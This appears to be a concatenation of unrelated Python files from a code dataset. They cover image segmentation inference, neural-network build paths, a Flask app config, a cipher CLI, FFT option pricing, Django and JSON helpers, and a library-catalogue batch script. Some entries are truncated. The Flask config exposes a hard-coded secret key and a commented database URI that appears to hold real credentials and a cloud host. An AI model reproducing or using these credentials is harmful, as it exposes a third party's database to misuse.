            filename = 'data/' + author + '_' + gistid + '.html'
            outfile = open(filename, 'w')  # NOTE(review): handle never closed
            outfile.write(code)
            simple_e = {}
            simple_e["uid"] = author + '_' + gistid
            simple_e["created_at"] = e["created_at"]
            simple_e["updated_at"] = e["updated_at"]
            simple_e["api"] = e["api"]
            simple_e["readme"] = e["readme"]
            simple_e["description"] = e["description"]
            simple_e["code"] = code # e["code"]
            output_json.append(simple_e)
    print len(output_json)
    with open('nodes.json', 'w') as datafile:
        json.dump(output_json, datafile)
def get_js_only(code):
    """Return the first-to-last ``<script>...</script>`` span of *code*, or None.

    The match is greedy, so everything between the first ``<script>`` and the
    LAST ``</script>`` is returned (preserves the original behavior).

    Fix: the previous version evaluated ``re.DOTALL`` and ``re.MULTILINE`` as
    bare expression statements, which has no effect whatsoever; the DOTALL
    flag is (and already was) passed directly to ``re.search``.
    """
    match = re.search('<script>.*</script>', code, re.DOTALL)
    if match is not None:
        return match.group(0)
    return None
if __name__ == "__main__":
    # Pass everything after the script name; main() reads argv[0] of this
    # slice as the input file path.
    main(sys.argv[1:])
def getArticle():
    """Read article.txt and wrap each non-blank line in a pseudo-JSON record."""
    with open('article.txt', 'r') as f:
        lines = f.readlines()
    text = []
    idx = 1
    for line in lines:
        if line == '\n':
            continue  # skip blank separator lines
        text.append("{ 'id':" + str(idx) + "," + "'text':" + line.rstrip() + " }")
        idx += 1
    return text
# Smoke test: load the article lines and dump them (Python 2 print statement).
a = getArticle()
print a
'''
create a list of 100 words article
use javascript to display those article when start is hit.
change to the next article
'''
|
5,687 | 559e46aa4e9b55f8c01acf30fa01e106ab914116 | # -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <daniel.seichter@tu-ilmenau.de>
"""
import argparse
from glob import glob
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn.functional as F
from src.args import ArgumentParserRGBDSegmentation
from src.build_model import build_model
from src.prepare_data import prepare_data
HOME = os.environ["HOME"]
def _load_img(fp):
    """Load an image unchanged; convert 3-channel images from BGR to RGB.

    Raises FileNotFoundError if OpenCV cannot read the file. (cv2.imread
    returns None instead of raising, which previously surfaced later as an
    opaque AttributeError on ``img.ndim``.)
    """
    img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)
    if img is None:
        raise FileNotFoundError(f"could not read image: {fp}")
    if img.ndim == 3:
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    return img
if __name__ == "__main__":
    # Parse CLI arguments, load a trained RGBD segmentation checkpoint, then
    # run inference on every (color, depth) pair under --data_root and show
    # each prediction next to its inputs.
    # arguments
    parser = ArgumentParserRGBDSegmentation(
        description="Efficient RGBD Indoor Sematic Segmentation (Inference)",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument(
        "--data_root",
        type=str,
        default=HOME + "/bags/june_25th/kinect_rgbd_person_act",
        help="Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth",
    )
    parser.set_common_args()
    parser.add_argument(
        "--ckpt_path",
        type=str,
        default="trained_models/nyuv2/r34_NBt1D_scenenet.pth",
        # default="trained_models/sunrgbd/r34_NBt1D.pth",
        help="Path to the checkpoint of the trained model.",
    )
    parser.add_argument(
        "--depth_scale",
        type=float,
        default=1.0,
        help="Additional depth scaling factor to apply.",
    )
    args = parser.parse_args()
    # dataset
    # TODO: set dataset to be sunrgbd
    # args.dataset = "sunrgbd"
    args.pretrained_on_imagenet = False  # we are loading other weights anyway
    dataset, preprocessor = prepare_data(args, with_input_orig=True)
    n_classes = dataset.n_classes_without_void
    # model and checkpoint loading
    model, device = build_model(args, n_classes=n_classes)
    # map_location keeps CPU-only machines working with GPU-trained weights
    checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)
    model.load_state_dict(checkpoint["state_dict"])
    print("Loaded checkpoint from {}".format(args.ckpt_path))
    model.eval()
    model.to(device)
    # get samples (sorted so color/depth pairs line up by filename order)
    rgb_filepaths = sorted(glob(os.path.join(args.data_root, "color/*.jpg")))
    depth_filepaths = sorted(glob(os.path.join(args.data_root, "depth/*.png")))
    assert args.modality == "rgbd", "Only RGBD inference supported so far"
    assert len(rgb_filepaths) == len(depth_filepaths)
    filepaths = zip(rgb_filepaths, depth_filepaths)
    # inference
    for fp_rgb, fp_depth in filepaths:
        # load sample
        img_rgb = _load_img(fp_rgb)
        img_depth = _load_img(fp_depth).astype("float32") * args.depth_scale
        h, w, _ = img_rgb.shape
        # preprocess sample
        sample = preprocessor({"image": img_rgb, "depth": img_depth})
        # add batch axis and copy to device
        image = sample["image"][None].to(device)
        depth = sample["depth"][None].to(device)
        # apply network, upsample logits back to the input resolution
        pred = model(image, depth)
        pred = F.interpolate(pred, (h, w), mode="bilinear", align_corners=False)
        pred = torch.argmax(pred, dim=1)
        pred = pred.cpu().numpy().squeeze().astype(np.uint8)
        # show result
        pred_colored = dataset.color_label(pred, with_void=False)
        fig, axs = plt.subplots(1, 3, figsize=(16, 3))
        [ax.set_axis_off() for ax in axs.ravel()]
        axs[0].imshow(img_rgb)
        axs[1].imshow(img_depth, cmap="gray")
        axs[2].imshow(pred_colored)
        plt.suptitle(
            f"Image: ({os.path.basename(fp_rgb)}, "
            f"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}"
        )
        # plt.savefig('./result.jpg', dpi=150)
        plt.show()
|
5,688 | d8d0c181fcfc9e0692369cc7a65259c43a68e931 | #
# struct_test.py
# Nazareno Bruschi <nazareno.bruschi@unibo.it>
#
# Copyright (C) 2019-2020 University of Bologna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
# Root of the PULP-NN checkout, one level above the current run directory.
# NOTE: "cwd" is kept (and repeatedly rebound, as before) purely for
# backward compatibility with code that may import it.
PULPNNInstallPath = cwd = os.getcwd() + "/../"
PULPNNSrcDirs = {'script': PULPNNInstallPath + "scripts/"}
PULPNNInstallPath32bit = cwd = os.getcwd() + "/../32bit/"
PULPNNInstallPath64bit = cwd = os.getcwd() + "/../64bit/"
PULPNNTestFolder32bit = PULPNNInstallPath32bit + "test/"
PULPNNTestFolder64bit = PULPNNInstallPath64bit + "test/"


def _make_src_dirs(install_path, test_folder):
    """Build the directory-layout dict shared by the 32- and 64-bit trees.

    Previously the two dicts below were written out twice by hand (~48
    duplicated lines); the layout is identical, only the roots differ.
    """
    return {
        'pulp_nn_inc': install_path + "include/",
        'pulp_nn_pointwise_convolution': install_path + "src/StandardConvolutions/",
        'pulp_nn_matmul': install_path + "src/MatrixMultiplications/",
        'pulp_nn_depthwise_convolution': install_path + "src/DepthwiseConvolutions/",
        'pulp_nn_linear_convolution_nq': install_path + "src/LinearConvolutionsNoQuant/",
        'pulp_nn_linear_convolution_q': install_path + "src/LinearConvolutionsQuant/",
        'pulp_nn_support_function': install_path + "src/SupportFunctions/",
        'include': test_folder + "include/",
        'src': test_folder + "src/",
        'pointwise_convolution': test_folder + "src/StandardConvolutions/",
        'matmul': test_folder + "src/MatrixMultiplications/",
        'depthwise_convolution': test_folder + "src/DepthwiseConvolutions/",
        'linear_convolution_nq': test_folder + "src/LinearConvolutionsNoQuant/",
        'linear_convolution_q': test_folder + "src/LinearConvolutionsQuant/",
        'support_function': test_folder + "src/SupportFunctions/",
        'data_allocation_pw': test_folder + "include/DataAllocationStandardConvolutions/",
        'data_allocation_dw': test_folder + "include/DataAllocationDepthwiseConvolutions/",
        'data_allocation_ln_nq': test_folder + "include/DataAllocationLinearConvolutionsNoQuant/",
        'data_allocation_ln_q': test_folder + "include/DataAllocationLinearConvolutionsQuant/",
        'golden_model_pw': test_folder + "include/GoldenModelStandardConvolutions/",
        'golden_model_dw': test_folder + "include/GoldenModelDepthwiseConvolutions/",
        'golden_model_ln_nq': test_folder + "include/GoldenModelLinearConvolutionsNoQuant/",
        'golden_model_ln_q': test_folder + "include/GoldenModelLinearConvolutionsQuant/",
        'test': test_folder,
    }


PULPNNSrcDirs32bit = _make_src_dirs(PULPNNInstallPath32bit, PULPNNTestFolder32bit)
PULPNNSrcDirs64bit = _make_src_dirs(PULPNNInstallPath64bit, PULPNNTestFolder64bit)
5,689 | 7b45c9e31bfb868b1abde6af0d8579b52f86d9c3 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from subprocess import call
app = Flask(__name__)
# SECURITY(review): the secret key and database credentials below are
# hard-coded in source (and a production-looking URI sits in the commented
# line). Move them to environment variables or an untracked config file.
app.config['SECRET_KEY'] = "SuperSecretKey"
#app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://fmnibhaashbxuy:73b8e2e2485adfd45f57da653d63950b88fdcae12202a84f80c7f4c297e9e30a@ec2-23-23-222-184.compute-1.amazonaws.com:5432/d27ig8fpt4ch7r"
app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://info2180-project1:password123@localhost/profilebook"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True # added just to suppress a warning
app.config['UPLOAD_FOLDER'] = './app/static/profile_photo'
db = SQLAlchemy(app)
# File extensions accepted for profile-photo uploads.
allowed_exts = ["jpg", "jpeg", "png"]
# Imported last on purpose: views needs "app" and "db" (circular import).
from app import views
5,690 | 5dccd015a90927e8d2a9c0ea4b11b24bfd4bb65e | import os
import pprint
import math
import sys
import datetime as dt
from pathlib import Path
import RotateCipher
import ShiftCipher
import TranspositionCipher
def process_textfile(
        string_path: str,
        encryption_algorithm: str,
        algorithm_key: float,
        output_folderpath: str = str(
            Path(os.path.expandvars("$HOME")).anchor
        ) + r"/EncryptDecrypt/",
        output_filename: str = r"EncryptDecrypt.txt",
        to_decrypt=False,
        **kwargs
):
    """Encrypt or decrypt a text file and append the result to an output file.

    Parameters
    ----------
    string_path:
        Path of the input text file.
    encryption_algorithm:
        ``"rotate"`` or ``"transposition"`` (case-insensitive).
    algorithm_key:
        Key for the chosen algorithm (rotations / transposition key).
    output_folderpath, output_filename:
        Where the result is appended; the folder is created if missing and
        ``.txt`` is appended to the file name if absent.
    to_decrypt:
        Decrypt instead of encrypt. Ignored by the rotate algorithm, which
        is reversed via its ``shift_left`` key-word argument instead.
    **kwargs:
        Algorithm-specific options (e.g. ``shift_left``, ``shift_numbers``).
        A single dict may also be passed as the only key-word argument.

    Returns
    -------
    dict with ``output_file`` (resolved Path) and ``output_text`` (str),
    or ``None`` for an unknown algorithm.

    Fixes over the previous version:
    * the "True"/"False" string-to-bool conversion compared the LOWERED
      value against capitalized "False"/"True" and therefore never fired;
    * the input file handle was opened but never closed.
    """
    encryption_algorithm = encryption_algorithm.lower()
    available_algorithms = ["rotate", "transposition"]
    if encryption_algorithm not in available_algorithms:
        pprint.pprint(
            ["Enter an algorithm from the list. Not case-sensitive.",
             available_algorithms]
        )
        return None
    # A single dictionary may be passed as a **kwarg if it is the
    # ONLY KEY-WORD ARGUMENT. Else, error is thrown.
    lst_kwargs = list(kwargs.values())
    if len(lst_kwargs) == 1 and (isinstance(lst_kwargs[0], dict)):
        kwargs = lst_kwargs[0]
    # Key in **kwargs overwrites `algorithm_key` function parameter.
    if "algorithm_key" in kwargs:
        algorithm_key = float(kwargs["algorithm_key"])
    # Convert strings saying "True" or "False" to booleans.
    # BUG FIX: compare against lower-case literals; the old comparison with
    # "False"/"True" could never match a .lower()-ed string.
    for key, value in kwargs.items():
        str_value = str(value)
        if str_value.lower() == "false":
            kwargs[key] = False
        elif str_value.lower() == "true":
            kwargs[key] = True
    output_filename = ('/' + output_filename)
    if not (output_filename.endswith(".txt")):
        output_filename += ".txt"
    full_outputpath = output_folderpath + output_filename
    path_input = Path(string_path)
    # BUG FIX: read via a context manager so the handle is always closed.
    with open(str(path_input), 'r') as fileobj_target:
        lst_input = fileobj_target.readlines()
    str_input = "".join(lst_input)
    output_string = "None"
    print(
        """Started processing.
    Key-word arguments for %s algorithm:""" % encryption_algorithm
    )
    pprint.pprint(kwargs)
    if (encryption_algorithm == "transposition") and to_decrypt is True:
        output_string = ''.join(
            TranspositionCipher.decrypt_transposition(
                str_input, int(algorithm_key)
            )
        )
    elif encryption_algorithm == "transposition" and not to_decrypt:
        output_string = ''.join(
            TranspositionCipher.encrypt_transposition(
                str_input, int(algorithm_key)
            )
        )
    elif encryption_algorithm == "rotate":
        warning = """
    When the algorithm is set to rotate, the "to_decrypt" parameter
    is ignored. To decrypt, set the key-word argument shift left
    so that it reverses the shift direction during encryption.
    Ex: If the text was shifted left, i.e. values were swapped
    with those "higher" up on the list read from left to right, pass
    the key-word argument shift_left=False to decrypt.
    RotateCipher's methods can return a list. However, it is
    forced to always return a string. Passing return_list=True as
    a key-word argument will have no effect. The argument is not
    passed to RotateCipher.
    """
        print(warning)
        to_shiftleft = True
        if "shift_left" in kwargs:
            to_shiftleft = kwargs["shift_left"]
        process_numbers = False
        if "shift_numbers" in kwargs:
            process_numbers = kwargs["shift_numbers"]
        output_string = RotateCipher.rot13_e(
            string=str_input,
            shift_left=to_shiftleft,
            rotations=int(algorithm_key),
            # return_list=kwargs["return_list"], # Removed for safety.
            shift_numbers=process_numbers
        )
    if not (os.path.exists(output_folderpath)):
        os.mkdir(output_folderpath)
    # Create the output file if needed and append (header + payload).
    with open(full_outputpath, 'a') as fileobj_output:
        fileobj_output.write(
            "\n=====\nEncryptDecrypt Output on\n%s\n=====\n" %
            dt.datetime.now()
        )
        fileobj_output.write(output_string)
    print("Done processing. Output folder:\n{}".format(
        Path(full_outputpath)
    )
    )
    return {
        "output_file": Path(full_outputpath).resolve(),
        "output_text": output_string
    }
def manual_test():
    """Ad-hoc, machine-specific smoke test: encrypt then decrypt local files.

    Uses hard-coded Windows paths, so it only runs on the original author's
    machine; kept for reference and invoked manually from main() if needed.
    """
    dict_processedtext = process_textfile(
        string_path=r"C:\Users\Rives\Downloads\Quizzes\Quiz 0 Overwrite Number 1.txt",
        encryption_algorithm="rotate",
        algorithm_key=1,
        shift_left=True
    )
    print("Encrypt ROT1 with default values.")
    # pprint.pprint(
    #     dict_processedtext
    # )
    print(dict_processedtext["output_file"])
    dict_processedtext2 = process_textfile(
        string_path=dict_processedtext["output_file"],
        encryption_algorithm="rotate",
        algorithm_key=1,
        output_folderpath=r"C:\Users\Rives\Downloads\Decryptions",
        output_filename="Quiz 0 Overwrite Number 1 Decrypted",
        shift_left=False
    )
    print("Decrypt ROT1 with all values user-supplied.")
    # NOTE(review): prints the FIRST result's path again; presumably
    # dict_processedtext2["output_file"] was intended here.
    print(dict_processedtext["output_file"])
    for i in range(2):
        dict_processedtext3a = process_textfile(
            string_path=r"C:\Users\Rives\Downloads\Quizzes\Quiz 0 Overwrite Number 2.txt",
            encryption_algorithm="rotate",
            algorithm_key=1,
            output_folderpath=r"C:\Users\Rives\Downloads\Encryptions"
        )
        print(dict_processedtext3a["output_file"])
        dict_processedtext3b = process_textfile(
            string_path=dict_processedtext3a["output_file"],
            encryption_algorithm="rotate",
            algorithm_key=1,
            output_folderpath=r"C:\Users\Rives\Downloads\Decryptions",
            output_filename="Quiz 0 Overwrite Number 2 Decrypted",
            shift_left=False
        )
        print(dict_processedtext3b["output_file"])
    return None
def main():
    """Interactive CLI loop: prompt for a file and options, then process it.

    Fix over the previous version: pressing Enter at the "Key?" prompt (as
    the banner explicitly allows) crashed with ValueError on ``float("")``.
    Empty or non-numeric input now falls back to the documented default 1.
    """
    while True:
        print("Press Enter or New Line to skip entering any input.\t")
        task = input("Encrypt or decrypt? Encrypts by default. Press E/D.\t")
        algo = input("Algorithm? Uses Rotate by default.\t")
        # BUG FIX: tolerate empty/invalid key input instead of crashing.
        raw_key = input("Key? Uses 1 by default.\t")
        try:
            algorithm_key = float(raw_key)
        except ValueError:
            algorithm_key = 1.0  # documented default
        input_filepath = input(
            """Mandatory / Required.
    Full path of target file. Includes file name and extension.\n""")
        output_folder = input(
            "Optional. Give the path of the output folder.\n"
        )
        output_file = input(
            "Optional. Default output file name is EncryptDecrypt.txt.\n")
        keyword_arguments = input(
            """Last question. Depends on algorithm.
    Format: "key=value,key2,value2,...".
    Use comma with no space as separator for two or more items.\n"""
        )
        while len(input_filepath) == 0:
            input_filepath = input(
                """Mandatory / Required.
    Full path of target file.
    Includes file name and extension.\n"""
            )
        # Parse "k=v,k2=v2" into a dict; stop at the first malformed pair.
        dict_kwargs = dict()
        for pair in keyword_arguments.split(','):
            try:
                key, pair = tuple(pair.split('='))
                dict_kwargs[key] = pair
            except ValueError:
                break
        to_decrypt = False
        if task.lower().startswith('d'):
            to_decrypt = True
        if len(output_folder) == 0:
            output_folder = str(Path.cwd().parent / r"/EncryptDecrypt/")
        if len(output_file) == 0:
            output_file = "EncryptDecrypt.txt"
        if len(algo) == 0:
            algo = "rotate"
        pprint.pprint(
            process_textfile(
                string_path=input_filepath,
                encryption_algorithm=algo,
                algorithm_key=algorithm_key,
                output_folderpath=output_folder,
                output_filename=output_file,
                to_decrypt=to_decrypt,
                kwargs_dict=dict_kwargs
            )
        )
        print(
            """Done Running.
    Press Q to quit, any other key to process another file.""")
        to_quit = input()
        if to_quit.lower().startswith("q"):
            sys.exit()
        else:
            continue
    # manual_test()
    return None
# Script entry point: start the interactive loop only when run directly.
if __name__ == "__main__":
    main()
"""
Notes:
*
The declared parameter data types in python functions are not enforced as of
version 3.4.
*
For some reason, even if the name "key" was a parameter for process_textfile,
it was being passed to rot13_e as a string. In the function process_textfile,
Visual Basic also listed "key" as a string when passed to rot13_e even though
the function definition specified its data type as a float and the user input
for "key" was also converted to a float in the main function. This was caused
by a for-loop. When VS Code followed the definition of key (F12) when it
was passed to rot13_e, VS Code pointed to the temporary variable "key" in a
for-loop. The parameter name was changed as a quick fix.
- Adding an else clause to the for-loop did not fix it.
- The for-loop declaration was funciton-level code while the call to rot13_e
that bugged was inside an else-clause. The else-clause holding the call to
rot13_e was also function-level, same as the for-loop declaration. The call
to RotateCipher.rot13_e was assigned to output_string.
"""
|
5,691 | 25987c15c28e3939f9f531dbc1d4bd9bf622b5a9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 14 01:32:26 2019
@author: himanshu
"""
import numpy as np
from scipy.interpolate import interp1d
from option import Option
class FFTPricing:
    """Price European options by Fourier inversion (Carr-Madan style).

    The damped Fourier transform of the option value is integrated on an
    N-point frequency grid of total width B, producing a price curve over
    a log-strike grid, which is then interpolated at the contract strike.
    """

    def __init__(self,
                 option: "Option",
                 riskFreeRate,
                 volatility,
                 samplePoints,
                 bandwidth,
                 dampingFactor,
                 underlyingModel = 'GBM'):
        self.__option = option
        self.__r = riskFreeRate
        self.__sigma = volatility
        self.__N = samplePoints        # number of frequency samples
        self.__B = bandwidth           # total width of the frequency grid
        self.__alpha = dampingFactor   # damping factor; use a negative value for puts
        self.__model = underlyingModel

    # Computes the characteristic function (of the damped log-price) for a GBM.
    def __charactersticFunc(self, omega):
        S0 = self.__option.underlyingPrice
        r = self.__r
        T = self.__option.timeToExpiry
        sigma = self.__sigma
        alpha = self.__alpha
        if self.__model == 'GBM':
            x0 = np.log(S0)
            mu = x0 + ((r - (sigma**2)/2)*(T))
            sig = (sigma**2)*(T)/2
            # Shift the argument by i*(alpha+1) to account for the damping term.
            omega_prime = omega + 1j*(alpha+1)
            return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))
        elif self.__model == 'VG':
            # Variance-Gamma model not implemented yet.
            pass

    # Computes the Fourier transform of the (discounted, damped) option value.
    def __fourierTransform(self, omega):
        alpha = self.__alpha
        r = self.__r
        T = self.__option.timeToExpiry
        q_hat = self.__charactersticFunc(omega)
        num = np.exp(-r*(T))*q_hat
        den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)
        return num/den

    def optionPrice(self):
        """Return the option value at the contract strike, rounded to 2 decimals.

        Only European-style contracts are supported; any other expiry type
        prints a warning and returns 0.0.
        """
        if not self.__option.expiryType == 'European':
            print('Not a European Option')
            return 0.0
        K = self.__option.strikePrice
        N = self.__N
        B = self.__B
        alpha = self.__alpha
        h = B/(N-1)             # frequency-grid spacing
        omega = np.arange(0,N)*h
        dk = 2*np.pi/(h*N)      # log-strike grid spacing (FFT duality relation)
        # NOTE(review): the log-strike grid is anchored at log(20); this looks
        # like a hard-coded choice tied to the demo parameters -- confirm it
        # always brackets log(K) for other inputs.
        k = np.log(20) + np.arange(0,N)*dk
        # Trapezoid-style quadrature weights (half weight on the first node).
        dw = np.zeros(N)
        dw[0] = h/2
        dw[1:] = h
        # The transform values do not depend on the output node n, so compute
        # them once here instead of once per loop iteration (the original
        # recomputed this identical array N times).
        nu_hat = self.__fourierTransform(omega)
        V = np.zeros(N)
        for n in range(N):
            inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)
            V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real
        # Interpolate the price curve at the requested log-strike.
        val = interp1d(k, V)
        return float('{0:.2f}'.format(val(np.log(K))))

    def __repr__(self):
        return "FFTPricing({}, {}, {}, {}, {}, {})"\
            .format(self.__option,
                    self.__r,
                    self.__sigma,
                    self.__N,
                    self.__B,
                    self.__alpha)
if __name__ == "__main__":
    from option import European

    # Demo: price a call and a put on the same underlying/strike pair.
    spot = 100
    strike = 110
    rate = 0.10
    maturity = 1
    vol = 0.25
    n_samples = 2**10
    band = 50
    damping = 10.0
    print('------------------------------------------------------------------'
          +'----------------------------')
    contract = European(spot, strike, maturity, 'Call')
    pricer = FFTPricing(contract, rate, vol, n_samples, band, damping)
    print(pricer)
    print('FFT price for Call:', pricer.optionPrice())
    print('------------------------------------------------------------------'
          +'----------------------------')
    # Puts use a negative damping factor.
    contract = European(spot, strike, maturity, 'Put')
    pricer = FFTPricing(contract, rate, vol, n_samples, band, -damping)
    print(pricer)
    print('FFT price for Put:', pricer.optionPrice())
|
5,692 | 08b53ba116b0c5875d39af4ce18296d547d5891d | import json
def get_json_data(page, file_path='geekshop/json_data.json'):
    """Return the section *page* from a JSON data file.

    Args:
        page: top-level key to extract from the parsed document.
        file_path: path to the JSON file (defaults to the original
            hard-coded location, so existing callers are unaffected).

    Raises:
        KeyError: if *page* is not a top-level key of the document.
    """
    # utf-8-sig tolerates a leading BOM in the data file.
    with open(file_path, encoding='utf-8-sig') as file:
        json_data = json.load(file)
    return json_data[page]
def get_json_products_data(file_path):
    """Load and return the whole JSON document stored at *file_path*."""
    # utf-8-sig tolerates a leading BOM in the data file.
    with open(file_path, encoding='utf-8-sig') as source:
        return json.load(source)
# print(get_json_products_data('geekshop/json_products_data.json'))
# print(get_json_data('products'))
|
5,693 | 4d57fa22282d7b3f8adabedd7a04e32767181890 | from functions.service_funcs.get_data import get_data_character
def clean_room(update):
    """Delete the character's current room, including all its mobs and items."""
    character, session = get_data_character(update, return_sess=True)
    if not (character and character.room):
        return
    room = character.room
    # Remove room contents first, then the room itself, in one transaction.
    for occupant in (room.mobs or []):
        session.delete(occupant)
    for thing in (room.items or []):
        session.delete(thing)
    session.delete(room)
    session.commit()
|
5,694 | 2f15814d97708e33585ea6b45e89b5a5e69d82fe | import json
import nltk
# Read one JSON document per line from the scraped posts file.
# NOTE(review): the slice drops the last two characters of each line,
# presumably a trailing ",\n" left by the scraper -- confirm the file format.
with open('posts.json', 'r') as infile:
    posts = []
    for line in infile:
        posts.append(json.loads(line[0:len(line)-2]))
# Pretty-print each post: banner, title/date, link, keywords, and a
# 100-token summary rendered with NLTK (Python 2 print statements).
for post in posts:
    print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print ''.join(post['title']) + ' Posted: ' + ''.join(post['posted'])
    print '\n'
    print ''.join(post['original_post_link'])
    print 'Keywords:'
    print post['keywords']
    print '\nSummary: \n'
    text = nltk.Text(post['tokenized_text'])
    print ' '.join(text[0:100]) + '\n'
5,695 | b874bb37fa59d9f1194c517bedbdbafae748786e | S = input()
T = []
sen = ["dream", "dreamer", "erase", "eraser"]
s_len = len(S)
while len(T) <= s_len:
|
5,696 | 05d21a27097cf3295e9328aeafa466973a4d2611 | /home/salmane/anaconda3/lib/python3.7/_weakrefset.py |
5,697 | 5e79a8a8fe79aac900fc0c2ff1caaa73ea08ada2 | from django import template
register = template.Library()
@register.filter(name='phone_number')
def phone_number(number):
    """Render a 10-character digit string as (xxx) xxx-xxxx."""
    area, exchange, line = number[0:3], number[3:6], number[6:10]
    return '(' + area + ')' + ' ' + exchange + '-' + line
|
5,698 | 1f94ef0aae1128089b34fc952766cc3927677cdf | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#Modules externes
import os
import re
import logging
import csv
import xml.etree.ElementTree as ET
from chardet import detect
#Modules maison
from Abes_Apis_Interface.AbesXml import AbesXml
from Alma_Apis_Interface import Alma_Apis_Records
from Alma_Apis_Interface import Alma_Apis
from logs import logs
# Service identity and logging configuration.
SERVICE = "Recotation_en_masse"
LOGS_LEVEL = 'INFO'
LOGS_DIR = os.getenv('LOGS_PATH')
# Target Alma library/institution and the API key (taken from the environment).
LIBRARY_CODE = 1601900000
REGION = 'EU'
INSTITUTION = 'ub'
API_KEY = os.getenv('PROD_UB_BIB_API')
# Input CSV and output report paths, all derived from the batch file name.
FILE_NAME = 'Dewey 20201218 cotes OE Scoop V3'
IN_FILE = '/media/sf_Partage_LouxBox/{}.csv'.format(FILE_NAME)
OUT_FILE = '/media/sf_Partage_LouxBox/{}_Rapport.csv'.format(FILE_NAME)
CALL_ERROR_FILE = '/media/sf_Partage_LouxBox/{}_Anomalies_Cotes.csv'.format(FILE_NAME)
# get file encoding type
def get_encoding_type(file):
    """Return the character encoding of *file* as detected by chardet."""
    with open(file, 'rb') as handle:
        raw_bytes = handle.read()
    return detect(raw_bytes)['encoding']
def item_change_location(item,location,call):
    """Move an item to *location* and strip its holding information.

    Arguments:
        item {xml.etree.ElementTree.Element} -- parsed XML of the get-item response
        location {str} -- new location code written into item_data/location
        call {str} -- new call number for the target location
    Returns:
        (str, str, str) -- mms_id, holding_id, pid of the item

    NOTE(review): this function also reads the module-level globals
    processed_record_dict, location_code, barcode and multi_call_report,
    and the inner membership check uses the global ``location_code`` rather
    than the ``location`` parameter. They are equal at the single call site,
    but the coupling is fragile -- TODO: pass these in explicitly.
    """
    mms_id, holding_id, pid = item.find(".//mms_id").text, item.find(".//holding_id").text, item.find(".//pid").text
    item.find(".//item_data/location").text = location
    # Clear the call number stored at item level.
    item.find(".//item_data/alternative_call_number").text = ''
    item.find(".//item_data/alternative_call_number_type").text = ''
    # Do not send the holding information back with the item.
    holding_data = item.find(".//holding_data")
    item.remove(holding_data)
    # If another item attached to the same record was already processed...
    if mms_id in processed_record_dict:
        # ...and it went to the same location as this item...
        if location_code in processed_record_dict[mms_id]:
            # ...but with a different call number, keep the call number on the
            # item itself and log the barcode in the anomalies report.
            if processed_record_dict[mms_id][location_code] != call:
                multi_call_report.write("{}\n".format(barcode))
                item.find(".//item_data/alternative_call_number").text = call
    return mms_id, holding_id, pid
def update_holding_data(holding,new_call):
    """Rewrite the 852 field of a holding record.

    Blanks the first indicator of the (first) 852 field and replaces the
    text of its $h subfield with *new_call*.

    Arguments:
        holding {str} -- XML of the get-holding response
        new_call {str} -- new value for the call subfield
    Returns:
        bytes -- serialized XML of the modified record
    """
    record = ET.fromstring(holding)
    field_852 = record.find(".//datafield[@tag='852']")
    field_852.set('ind1', ' ')
    subfield_h = record.find(".//datafield[@tag='852']/subfield[@code='h']")
    subfield_h.text = new_call
    return ET.tostring(record)
# Init logger
logs.init_logs(LOGS_DIR,SERVICE,LOGS_LEVEL)
log_module = logging.getLogger(SERVICE)
# Alma API clients: `conf` for configuration lookups, `alma_api` for record/item calls.
conf = Alma_Apis.Alma(apikey=API_KEY, region='EU', service=SERVICE)
alma_api = Alma_Apis_Records.AlmaRecords(apikey=API_KEY, region=REGION, service=SERVICE)
# We get all the locations for the library in a dictionary (label -> code).
locations_dict = conf.get_locations(LIBRARY_CODE)
log_module.info("Liste des localisation chargée pour la bibliothèque {} :: Main :: Début du traitement".format(LIBRARY_CODE))
# Tab-separated processing report, one line per barcode.
report = open(OUT_FILE, "w", encoding='utf-8')
report.write("Code-barres\tStatut\tMessage\n")
# mms_id -> {location_code: call} of records already processed
# (read by item_change_location to detect conflicting call numbers).
processed_record_dict = {}
# new holding_id -> {'call', 'barcode'}: queue for the holding-update pass below.
toprocess_holding_dict = {}
# Report of barcodes whose record already had a different call in the same location.
multi_call_report = open(CALL_ERROR_FILE, "w", encoding='utf-8')
multi_call_report.write("code-barres\n")
### Update item sequence
# ######################
# Sniff the CSV encoding first, then stream it row by row:
# column 0 = barcode, 1 = new call number, 3 = new location label.
from_codec = get_encoding_type(IN_FILE)
with open(IN_FILE, 'r', encoding=from_codec, newline='') as f:
    reader = csv.reader(f, delimiter=';')
    headers = next(reader)
    # We read the file
    for row in reader:
        if len(row) < 2:
            continue
        barcode = row[0]
        # Test if new call is defined
        # NOTE(review): csv.reader yields strings, so the `is None` half of
        # this test never fires; only the empty-string check is live.
        if row[1] is None or row[1] == '':
            log_module.error("{} :: Echec :: pas de cote fournie".format(barcode))
            report.write("{}\tErreur Fichier\tPas de cote fournie\n".format(barcode))
            continue
        call = row[1].upper()
        # Test if new localisation is defined
        # NOTE(review): rows with fewer than 4 columns raise IndexError here --
